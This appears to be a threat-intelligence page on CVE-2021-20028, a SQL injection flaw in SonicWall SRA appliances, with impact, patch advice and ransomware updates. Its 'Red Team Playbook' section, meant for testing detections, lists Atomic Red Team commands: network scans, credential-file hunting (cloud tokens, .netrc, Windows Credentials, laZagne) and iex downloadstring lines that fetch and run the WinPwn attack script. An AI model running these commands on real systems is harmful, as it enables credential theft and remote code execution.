CVE-2021-20028
Overview
This vulnerability is a SQL Injection flaw caused by improper neutralization of SQL commands within the SonicWall Secure Remote Access (SRA) appliances. The root cause lies in insufficient input validation and sanitization of user-supplied data in the backend database queries. The affected components are the SRA appliances running firmware versions 8.x and 9.0.0.9-26sv or earlier, which improperly handle SQL commands in their authentication or request processing modules.
Vulnerability Description
Improper neutralization of a SQL Command leading to SQL Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products, specifically the SRA appliances running all 8.x firmware and 9.0.0.9-26sv or earlier
Impact
An unauthenticated attacker can exploit this SQL Injection vulnerability to execute arbitrary SQL commands on the backend database of SonicWall SRA appliances. This enables extraction, modification, or deletion of sensitive authentication data and configuration information. Successful exploitation can lead to full compromise of the appliance, allowing attackers to bypass access controls, obtain administrative credentials, and move laterally within the network. No prior authentication or user interaction is required, increasing the risk of widespread exploitation and data breaches.
Solution
SonicWall has issued an advisory (SNWLID-2021-0017) recommending immediate upgrade of affected SRA appliances to firmware versions later than 9.0.0.9-26sv. Users should apply the latest patches provided by SonicWall for SMA 210, SMA 410, SMA 500v, SRA 4600, and SRA 1600 models. Detailed patch instructions and version-specific updates are available at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0017. No workarounds are officially recommended; timely firmware upgrade is essential to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from improper neutralization of SQL commands, leading to a significant SQL injection risk in specific end-of-life Secure Remote Access (SRA) products. This flaw affects appliances running firmware versions 8.x and 9.0.0.9-26sv or earlier. SQL injection vulnerabilities occur when an application improperly validates or sanitizes user input, allowing an attacker to manipulate SQL queries executed by the database. In this case, the affected SRA products can be exploited to execute arbitrary SQL commands, potentially exposing sensitive data or allowing unauthorized access to the system.
Attack vectors for this vulnerability are varied and can be executed remotely, making it particularly dangerous. An attacker could craft malicious input that is processed by the vulnerable SQL queries, leading to unauthorized data retrieval, modification, or even deletion. Exploitation scenarios may include accessing user credentials, sensitive configuration data, or other critical information stored within the database. Given the nature of remote access appliances, an attacker could gain foothold into an organization's network, escalating privileges and compromising additional systems. The ease of exploitation, combined with the potential for significant data breaches, underscores the severity of this vulnerability.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on the affected SRA products for secure remote access. The risk extends beyond mere data exposure; it can lead to financial losses, reputational damage, and regulatory penalties if sensitive information is compromised. Organizations may face operational disruptions as they scramble to mitigate the effects of an attack or to respond to regulatory inquiries. Furthermore, the end-of-life status of these products means that users may not receive timely updates or patches, exacerbating the risk and leaving systems vulnerable to ongoing exploitation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular vulnerability assessments and penetration testing can help identify potential weaknesses in their systems. Monitoring for unusual database activity can also serve as an early warning system for exploitation attempts. Organizations should prioritize upgrading or replacing affected appliances with supported versions that have addressed this vulnerability. Additionally, employing web application firewalls (WAFs) can provide an additional layer of defense by filtering and monitoring HTTP requests, potentially blocking malicious input before it reaches the database.
In conclusion, the SQL injection vulnerability in specific Secure Remote Access products poses a significant threat to organizations that rely on these systems for secure connectivity. With the potential for severe consequences, including data breaches and operational disruptions, it is critical for organizations to take proactive measures to detect and mitigate this risk. By understanding the nature of the vulnerability, recognizing the attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the threats posed by this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-20028, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This uptick, while still limited in absolute terms, signals increased adversary interest and potential preparatory actions for broader exploitation campaigns. The persistence of ransomware groups such as Sinobi in association with this vulnerability underscores its continued attractiveness as a vector for intrusion and post-compromise operations. Although no new exploit variants have surfaced, the elevated detection trend heightens the urgency for defenders to maintain vigilant monitoring and reinforces the criticality of addressing this vulnerability in legacy Secure Remote Access deployments. Consequently, the threat level should be considered elevated from moderate to high, reflecting the growing likelihood of exploitation attempts that could lead to significant operational and data security impacts.
Update 2 — May 15, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-20028, with telemetry indicating a sustained increase in exploitation attempts targeting legacy Secure Remote Access appliances. This upward trend is corroborated by a rising EPSS score, now approaching the upper percentile range, signaling heightened attacker interest and potential for successful compromise. The persistence of ransomware groups such as Sinobi in campaigns leveraging this vulnerability further amplifies its operational relevance. Although no novel exploit variants have been identified, the intensification of detection events underscores an evolving threat environment where adversaries continue to probe and exploit known weaknesses in end-of-life firmware. For defenders, this development signifies an elevated risk posture, necessitating increased vigilance in monitoring and response activities. Consequently, the threat level associated with CVE-2021-20028 should be reassessed as high, reflecting the growing probability of impactful exploitation that could disrupt critical infrastructure and data integrity.
Update 3 — May 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-20028, with telemetry indicating a significant uptick in exploitation attempts targeting vulnerable SonicWall SRA appliances. Although the EPSS score shows a slight decline, the overall detection trend reflects increased adversary interest, particularly from ransomware-linked groups such as Sinobi. This resurgence in probing and exploitation attempts against end-of-life firmware underscores a persistent and evolving threat landscape where attackers continue to leverage this critical SQL injection vulnerability. For defenders, the heightened activity signals an increased likelihood of successful compromise, elevating the operational risk associated with unpatched or unsupported SRA devices. Consequently, the threat level for CVE-2021-20028 warrants reassessment to reflect a sustained high risk, emphasizing the need for ongoing situational awareness despite the absence of new exploit variants.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sma 210 Firmware | All |
cpe:2.3:o:sonicwall:sma_210_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 410 Firmware | All |
cpe:2.3:o:sonicwall:sma_410_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 500v Firmware | All |
cpe:2.3:o:sonicwall:sma_500v_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sra 4600 Firmware | All |
cpe:2.3:o:sonicwall:sra_4600_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sra 1600 Firmware | All |
cpe:2.3:o:sonicwall:sra_1600_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sra Va Firmware | All |
cpe:2.3:o:sonicwall:sra_va_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-20028 |
| psirt.global.sonicwall.com |
GitHub CVE
x_refsource_CONFIRM
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0017 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20028 |